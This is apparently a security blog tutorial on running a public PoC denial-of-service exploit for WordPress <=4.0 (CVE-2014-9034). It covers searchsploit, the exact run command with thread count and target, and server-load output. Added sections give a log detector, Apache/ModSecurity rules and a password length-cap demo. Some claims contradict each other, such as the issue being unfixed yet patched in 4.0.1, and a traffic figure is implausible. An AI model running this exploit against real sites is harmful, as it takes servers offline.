The Proof of Concept PHP exploit for the WordPress DoS attack CVE-2014-9034 worked like a charm on my own WordPress website. Surprisingly, CVE-2014-9034 was published some time ago and it seems WordPress still hasn’t fixed this issue. I will explain how to use this Proof of Concept tool and test your own WordPress website for the vulnerability.
WordPress DoS Attack – CVE-2014-9034
Credit for the WordPress DoS attack (Denial of Service Proof of Concept PHP Exploit CVE-2014-9034: WordPress <=4.0) goes to John from http://secureli.com.
Searching for exploits using searchsploit
How many of you have used searchsploit in Kali Linux? It’s a nice tool that updates and downloads exploits often. I use it quite extensively along with Metasploit.
Use searchsploit to search for specific exploits. You can use it like this:
root@kali: # searchsploit wordpress denial
---------------------------------------------|----------------------------------
Description | Path
---------------------------------------------|----------------------------------
WordPress <=4.0 Denial of Service Exploit | /php/webapps/35413.php
Wordpress < 4.0.1 - Denial of Service | /php/webapps/35414.txt
---------------------------------------------|----------------------------------
root@kali: #
Just in case you want to search for something else, use -h and it shows the help menu. Now help yourself to find more vulnerabilities.
root@kali: # searchsploit -h
Usage : searchsploit [OPTIONS] term1 [term2] ... [termN]
Example: searchsploit oracle windows local
=========
OPTIONS
=========
-c - Perform case-sensitive searches; by default,
searches will try to be greedy
-v - By setting verbose output, description lines
are allowed to overflow their columns
-h, --help - Show help screen
NOTES:
- Use any number of search terms you would like (minimum: 1)
- Search terms are not case sensitive, and order is irrelevant
root@kali: #
Using searchsploit results
The searchsploit files are located in the /usr/share/exploitdb/ folder. You need to copy the exploit file to your home directory or somewhere similar.
root@kali: # mkdir bmo
root@kali: # cd bmo/
root@kali: /bmo#
root@kali: /bmo# cp /usr/share/exploitdb/platforms/php/webapps/35413.php .
root@kali: /bmo#
root@kali: /bmo#
Running the exploit
To run this script you need to use the PHP command. Here’s the little help menu:
CVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability
Proof-of-Concept developed by john@secureli.com (http://secureli.com)
usage: php wordpressed.php domain.com username numberOfThreads
e.g.: php wordpressed.php wordpress.org admin 50
The first time I tried to run this PHP exploit, I received an error:
root@kali: /bmo# php 35413.php somerandomsite.com admin 50
CVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability
Proof-of-Concept developed by john@secureli.com (http://secureli.com)
usage: php wordpressed.php domain.com username numberOfThreads
e.g.: php wordpressed.php wordpress.org admin 50
Sending POST data (username: admin; threads: 50) to somerandomsite.com
PHP Fatal error: Call to undefined function curl_multi_init() in /root/wp/35413.php on line 12
This is because a package is missing in my Kali Linux. I need to install the php5-curl package for that.
root@kali: /bmo# apt-get install php5-curl
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
php5-curl
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 29.4 kB of archives.
After this operation, 116 kB of additional disk space will be used.
Get:1 http://security.kali.org/kali-security/ kali/updates/main php5-curl amd64 5.4.36-0+deb7u1 [29.4 kB]
Fetched 29.4 kB in 1s (18.8 kB/s)
Selecting previously unselected package php5-curl.
(Reading database ... 389427 files and directories currently installed.)
Unpacking php5-curl (from .../php5-curl_5.4.36-0+deb7u1_amd64.deb) ...
Processing triggers for libapache2-mod-php5 ...
[ ok ] Reloading web server config: apache2 not running.
Setting up php5-curl (5.4.36-0+deb7u1) ...
Creating config file /etc/php5/mods-available/curl.ini with new version
Processing triggers for libapache2-mod-php5 ...
[ ok ] Reloading web server config: apache2 not running.
root@kali: /bmo#
Now retry running the exploit:
root@kali: /bmo# php 35413.php somerandomsite.com admin 50
CVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability
Proof-of-Concept developed by john@secureli.com (http://secureli.com)
usage: php wordpressed.php domain.com username numberOfThreads
e.g.: php wordpressed.php wordpress.org admin 50
Sending POST data (username: admin; threads: 50) to somerandomsite.com^C
root@kali: /bmo#
Server-side experience
This is what the server side looks like:
someuser@someserver [/home]# pstree
init─┬─/usr/local/cpan
├─httpd─┬─167*[httpd]
├─postgresql──238*
├─named───3*[{named}]
├─rsyslogd───3*[{rsyslogd}]
├─sshd───sshd───bash───pstree
httpd condition before
Server Built: November 17 2014 14:25:08
__________________________________________________________________
Current Time: Thursday, 08-Jan-2015 17:06:52 GMT
Restart Time: Thursday, 08-Jan-2015 16:13:46 GMT
Parent Server Generation: 0
Server uptime: 53 minutes 6 seconds
Total accesses: 6353 - Total Traffic: 26.9 MB
CPU Usage: u89.86 s19.17 cu0 cs0 - 3.42% CPU load
1.99 requests/sec - 8.7 kB/second - 4446 B/request
1 requests currently being processed, 9 idle workers
___W___.._...._.._..............................................
................................................................
................................................................
................................................................
Scoreboard Key:
"_" Waiting for Connection, "S" Starting up, "R" Reading Request,
"W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
"C" Closing connection, "L" Logging, "G" Gracefully finishing,
"I" Idle cleanup of worker, "." Open slot with no current process
httpd condition after
Server Built: November 17 2014 14:25:08
__________________________________________________________________
Current Time: Thursday, 08-Jan-2015 17:08:51 GMT
Restart Time: Thursday, 08-Jan-2015 17:08:26 GMT
Parent Server Generation: 0
Server uptime: 25 seconds
Total accesses: 334 - Total Traffic: 64 GB
CPU Usage: u1.85 s.33 cu0 cs0 - 8.72% CPU load
1.36 requests/sec - 2621 B/second - 1927 B/request
251 requests currently being processed, 12 idle workers
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW_W_WWWWWWW____....__..C
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW_W_WWWWWWW....WWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW_W_WWWWWWW..WWWWWWW....
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW_W_WWWWWWW.............
Scoreboard Key:
"_" Waiting for Connection, "S" Starting up, "R" Reading Request,
"W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
"C" Closing connection, "L" Logging, "G" Gracefully finishing,
"I" Idle cleanup of worker, "." Open slot with no current process
Visible in my monitoring
So how does it look in my Munin monitoring? Well, pretty f’ed up. I got massive spikes all over the place.
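What the Munin graphs show can also be pulled from the web server’s access log. The script below is an added example, not part of the original post or of John’s PoC: it parses Apache combined-format log lines and flags any client that sends more than a threshold of POSTs to wp-login.php inside a sliding time window. The log lines, the 20-request threshold and the 60-second window are constructed assumptions to tune for your own site.

```python
"""Flag wp-login.php POST floods in an Apache combined-format access log.

Added example (not from the post or the PoC). Assumes the standard
"combined" log format; threshold and window are assumptions to tune.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
WINDOW = timedelta(seconds=60)   # assumed window
THRESHOLD = 20                   # assumed max POSTs per IP per window


def parse_line(line):
    """Return (ip, timestamp, method, path-without-query) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path").split("?")[0]


def find_login_floods(lines, threshold=THRESHOLD, window=WINDOW):
    """Return {ip: peak_count} for every client whose POSTs to wp-login.php
    exceed `threshold` inside any `window`. Lines for one IP must be in time order."""
    recent = defaultdict(deque)   # per-IP timestamps inside the current window
    peaks = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path = parsed
        if method != "POST" or not path.endswith("/wp-login.php"):
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks


def build_sample():
    """Constructed log lines: one client fires 25 POSTs in 10 s, another logs in normally."""
    base = datetime(2015, 1, 8, 17, 8, 0, tzinfo=timezone.utc)
    fmt = "%d/%b/%Y:%H:%M:%S +0000"
    lines = []
    for i in range(25):
        t = (base + timedelta(milliseconds=400 * i)).strftime(fmt)
        lines.append(f'203.0.113.5 - - [{t}] "POST /wp-login.php HTTP/1.1" 200 3201 "-" "curl/7.38"')
    t = base.strftime(fmt)
    lines.append(f'198.51.100.7 - - [{t}] "GET /wp-login.php HTTP/1.1" 200 2511 "-" "Mozilla/5.0"')
    lines.append(f'198.51.100.7 - - [{t}] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for ip, peak in find_login_floods(build_sample()).items():
        print(f"{ip}: {peak} POSTs to wp-login.php within {WINDOW.seconds}s")
```

Feed it `sys.stdin` or an open log file instead of `build_sample()` to run it over a real log; the per-IP queues keep memory bounded by the window, so it is cheap enough to run from cron and pipe the result into a firewall rule or alert.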
Defending against these attacks
The following are your options:
- The best way is to restrict the wp-admin folder to specific IPs.
- Throttle connections per IP.
- Use a WAF.
- Write your own ModSecurity rules in Apache, or the equivalent in NGINX (actually it would be nice to see how NGINX holds up against such attacks; any takers?).
- Keep WordPress updated.
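The first options above can be expressed directly in Apache configuration. The fragment below is an added example, not the post’s or WordPress’s own configuration; it assumes Apache 2.4 syntax and mod_security2, and the address block 198.51.100.0/24 is a placeholder for your own admin addresses.

```apache
# Added example (not from the post or the PoC). Apache 2.4 syntax; the
# network 198.51.100.0/24 is a placeholder for your own admin addresses.

# 1. Only known addresses may reach the admin area and the login form.
<Location "/wp-admin">
    Require ip 198.51.100.0/24
</Location>

<Files "wp-login.php">
    Require ip 198.51.100.0/24
    # 2. A real login form is a few hundred bytes; capping the request body
    #    means a multi-megabyte "password" is rejected before PHP ever sees it.
    LimitRequestBody 8192
</Files>

# 3. With mod_security2 loaded: reject oversized password fields on the login
#    form even if the IP restriction above cannot be used on a site.
<IfModule security2_module>
    SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \
        "id:100001,phase:2,chain,deny,status:413,log,msg:'Oversized WordPress password field'"
        SecRule ARGS_POST:pwd "@rx ^.{4096,}"
</IfModule>
```

The body-size cap is the cheapest control here because it is enforced by the core server with no module dependency; the ModSecurity rule is narrower (only the pwd field) and therefore safer on sites that also accept legitimate large POSTs to other URLs.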
Conclusion
All in all, it’s a nice exploit and it does what it’s supposed to do: generate massive numbers of connections and MySQL load on a server. Run it for a few minutes and, if the server is not throttling connections per IP, it will make the server unresponsive.
Here is John’s original post http://secureli.com/2014/11/28/wordpress40-denialofservice-proofofconcept/ about this exploit, and I think WordPress should fix it ASAP.
The following explanation is taken from John’s site:
CVE-2014-9034 was published recently, highlighting an issue that “allows remote attackers to cause a denial of service (CPU consumption) via a long password that is improperly handled during hashing” due to phpass usage.
The full vulnerability information is available from:
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034
- http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
- https://wpvulndb.com/vulnerabilities/7681
This exploit uses a denial of service attack against wp-includes/class-phpass.php in the following WP versions:
- before 3.7.5
- 3.8.x before 3.8.5
- 3.9.x before 3.9.3
- 4.x before 4.0.1
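Why a size limit before hashing is the right fix: phpass’s portable hash feeds the whole password back into every md5 iteration, so CPU time grows with the length of whatever the attacker submits. The Python below is an added example, not code from the post, from John’s PoC or from WordPress; the iterated-md5 function is a stand-in that reproduces the shape of phpass’s loop rather than the real implementation, and the 4096-byte cap is my recollection of what the WordPress 4.0.1 fix applies before hashing, which you should verify against your own version.

```python
"""Length cap before an iterated password hash.

Added example, not code from the post, the PoC or WordPress.
phpass_like_hash is a stand-in for phpass's crypt_private loop (assumption:
same shape, not the real implementation). MAX_PASSWORD_BYTES is assumed to
match the cap WordPress 4.0.1 applies before hashing; verify for your version.
"""
import hashlib
import hmac
import time

MAX_PASSWORD_BYTES = 4096   # assumed value of the 4.0.1 cap


def phpass_like_hash(salt: bytes, password: bytes, count_log2: int = 8) -> bytes:
    """Stand-in for phpass: md5(salt+pw), then md5(hash+pw) repeated 2**count_log2
    times. Every iteration re-hashes the full password, so cost scales with its length."""
    h = hashlib.md5(salt + password).digest()
    for _ in range(1 << count_log2):
        h = hashlib.md5(h + password).digest()
    return h


def check_password_vulnerable(candidate: bytes, salt: bytes, stored: bytes) -> bool:
    """Pre-4.0.1 shape: hashes whatever arrives, however large."""
    return hmac.compare_digest(phpass_like_hash(salt, candidate), stored)


def check_password_hardened(candidate: bytes, salt: bytes, stored: bytes) -> bool:
    """4.0.1 shape: refuse oversized input before the expensive loop runs.
    Rejecting is correct because no legitimate stored password is that long."""
    if len(candidate) > MAX_PASSWORD_BYTES:
        return False
    return hmac.compare_digest(phpass_like_hash(salt, candidate), stored)


def time_hash(password_len: int, count_log2: int = 8) -> float:
    """Seconds spent in the stand-in hash for a password of the given length."""
    pw = b"a" * password_len
    t0 = time.perf_counter()
    phpass_like_hash(b"saltsalt", pw, count_log2)
    return time.perf_counter() - t0


if __name__ == "__main__":
    # Constructed demonstration: the same loop, a 16-byte vs a 200 kB password.
    print(f"16 B password:    {time_hash(16):.6f} s")
    print(f"200 kB password:  {time_hash(200_000):.6f} s")
    salt = b"saltsalt"
    stored = phpass_like_hash(salt, b"correct horse")
    print("hardened check, oversized input:",
          check_password_hardened(b"a" * 1_000_000, salt, stored))
```

The timing lines make the root cause visible: the hardened check returns False for the million-byte input in microseconds, whereas the vulnerable check would spend 2**8 full md5 passes over a megabyte for each such request, which is exactly the per-thread cost the PoC multiplies across its worker threads.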
This is the first exploit for such an attack, and thanks to John for bringing it to our attention. Enjoy, and make sure your website is protected against such attacks. Share and RT.